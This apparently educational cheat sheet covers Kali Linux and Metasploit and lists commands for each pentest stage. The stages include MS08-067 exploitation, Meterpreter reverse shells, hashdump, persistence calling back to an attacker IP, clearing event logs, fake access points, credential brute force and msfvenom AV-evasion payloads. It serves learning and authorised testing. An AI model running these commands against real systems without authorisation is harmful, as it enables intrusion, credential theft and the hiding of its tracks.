[Learning] Pentester's Cheat Sheet: Mastering Kali Linux and Metasploit

Table of Contents

  1. Introduction

    • Overview of Kali Linux
    • Importance of Metasploit in Penetration Testing
    • Setting Up Your Kali Environment
  2. Getting Started with Metasploit

    • Guidelines:
      • Always update Metasploit to ensure access to the latest exploits and modules.
      • Familiarize yourself with the basic structure of the Metasploit Framework (MSF).
    • Commands:
      • msfconsole - Launch Metasploit.
      • help - List available commands.
      • search <keyword> - Search for specific modules.
      • use <module> - Load a module for use.
      • info <module> - Get detailed information about a module.
  3. Understanding Metasploit Architecture

    • Guidelines:
      • Understand the role of different modules: exploits, payloads, auxiliaries, etc.
      • Utilize the database to track and manage your penetration testing efforts.
    • Commands:
      • db_status - Check database connection status.
      • hosts - List all hosts in the database.
      • services - List all services discovered on hosts.
      • vulns - List all vulnerabilities identified.
  4. Information Gathering

    • Guidelines:
      • Conduct thorough reconnaissance before attempting any exploitation.
      • Use both active and passive information-gathering techniques.
    • Commands:
      • nmap -sn <target> - Ping sweep (host discovery) using Nmap; -sP is the older, deprecated spelling of the same option.
      • use auxiliary/scanner/portscan/tcp - TCP port scanning.
      • use auxiliary/scanner/smtp/smtp_version - Enumerate SMTP version.
      • use auxiliary/scanner/snmp/snmp_login - Brute-force SNMP community strings.
  5. Vulnerability Scanning

    • Guidelines:
      • Integrate with other vulnerability scanners like Nexpose for comprehensive assessments.
      • Analyze scan results carefully to prioritize high-risk vulnerabilities.
    • Commands:
      • use exploit/windows/smb/ms08_067_netapi, then check - Test whether a host is vulnerable to MS08-067 without exploiting it (there is no separate scanner module; the exploit module's check command does this).
      • nexpose_connect <user>:<password>@<host> - Connect Metasploit to Nexpose.
      • db_import <file> - Import scan results from external tools.
  6. Exploitation

    • Guidelines:
      • Always test exploits in a controlled environment before deploying them.
      • Use resource scripts to automate repetitive tasks.
    • Commands:
      • use exploit/windows/smb/ms08_067_netapi - Use MS08-067 exploit.
      • set RHOSTS <target IP> - Set the target IP address (older Metasploit versions used RHOST for single-target exploits).
      • exploit - Run the exploit.
      • resource <script.rc> - Execute a series of commands from a script.
  7. Payloads and Shells

    • Guidelines:
      • Choose payloads based on the environment and security controls in place.
      • Meterpreter is versatile for post-exploitation; learn its commands well.
    • Commands:
      • set PAYLOAD windows/meterpreter/reverse_tcp - Set Meterpreter as the payload.
      • sessions -i <id> - Interact with an active session.
      • upload <local file> <remote path> - Upload a file to the target.
      • hashdump - Dump password hashes from the target.
  8. Post-Exploitation

    • Guidelines:
      • Focus on escalating privileges and maintaining access to the compromised system.
      • Always clean up after your activities to avoid detection.
    • Commands:
      • getsystem - Attempt to escalate privileges on the target.
      • run post/windows/gather/credentials/windows_autologin - Gather credentials.
      • persistence -U -i 5 -p 4444 -r <your IP> - Set up persistent access.
      • clearev - Clear event logs on the target system.
  9. Metasploit for Web Application Testing

    • Guidelines:
      • Focus on common web vulnerabilities like SQL injection and XSS.
      • Use Metasploit's web-related auxiliary and exploit modules.
    • Commands:
      • use auxiliary/scanner/http/sql_injection - Scan for SQL injection vulnerabilities.
      • use exploit/multi/http/php_cgi_arg_injection - Exploit PHP CGI Argument Injection.
      • set RHOSTS <target> - Specify the target web application.
  10. Social Engineering with Metasploit

    • Guidelines:
      • Always get consent before conducting social engineering tests.
      • Combine Metasploit with the Social Engineering Toolkit (SET) for advanced attacks.
    • Commands:
      • use auxiliary/server/browser_autopwn - Exploit browsers via social engineering.
      • use auxiliary/spoof/fakeap - Set up a fake access point.
      • use auxiliary/server/capture/pop3 - Capture POP3 credentials.
  11. Database and Credential Attacks

    • Guidelines:
      • Target databases with weak configurations or outdated software.
      • Use brute force and dictionary attacks with caution to avoid detection.
    • Commands:
      • use auxiliary/scanner/mysql/mysql_version - Identify MySQL version.
      • use auxiliary/scanner/mssql/mssql_login - Brute force MSSQL credentials.
      • use auxiliary/scanner/ssh/ssh_login - SSH login brute force.
  12. Bypassing Anti-Virus and Firewalls

    • Guidelines:
      • Use evasion techniques to bypass AV and firewall defenses.
      • Encode payloads and use obfuscation techniques to avoid detection.
    • Commands:
      • set ENCODER x86/shikata_ga_nai - Use an encoder to obfuscate payloads. Note that shikata_ga_nai is a polymorphic XOR encoder that has been signatured for years; encoding alone rarely defeats current AV.
      • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> -e x86/shikata_ga_nai -f exe > payload.exe - Create an encoded payload (LPORT defaults to 4444 if not set).
      • use exploit/windows/smb/smb_relay - Relay captured SMB authentication to another host (MS08-068 SMB relay).
  13. Advanced Metasploit Techniques

    • Guidelines:
      • Customize Metasploit by writing your own modules for specific scenarios.
      • Automate common tasks using scripts or the Metasploit API.
    • Commands:
      • edit <module> - Edit an existing module.
      • msfvenom - Generate custom payloads.
      • use post/windows/manage/migrate - Migrate Meterpreter to another process.
  14. Reporting and Documentation

    • Guidelines:
      • Document every step of your penetration test for accountability and review.
      • Use Metasploit’s built-in reporting features to generate detailed reports.
    • Commands:
      • sessions -l -v - List active sessions with detailed information.
      • loot - List all captured data.
      • db_export -f xml -a <filename.xml> - Export database contents to XML.
  15. Resources for Continued Learning

Appendices

  • A. Common Metasploit Commands
    • search <term> - Search for modules.
    • back - Exit current context/module.
    • jobs -l - List running jobs.
    • spool <filename> - Save console output to a file.
  • B. Useful Scripts and Tools
    • resource <script> - Execute a script of Metasploit commands.
    • msfvenom - Standalone payload generator.
    • msfupdate - Update Metasploit to the latest version.
  • C. Cheat Sheets and Quick Reference Guides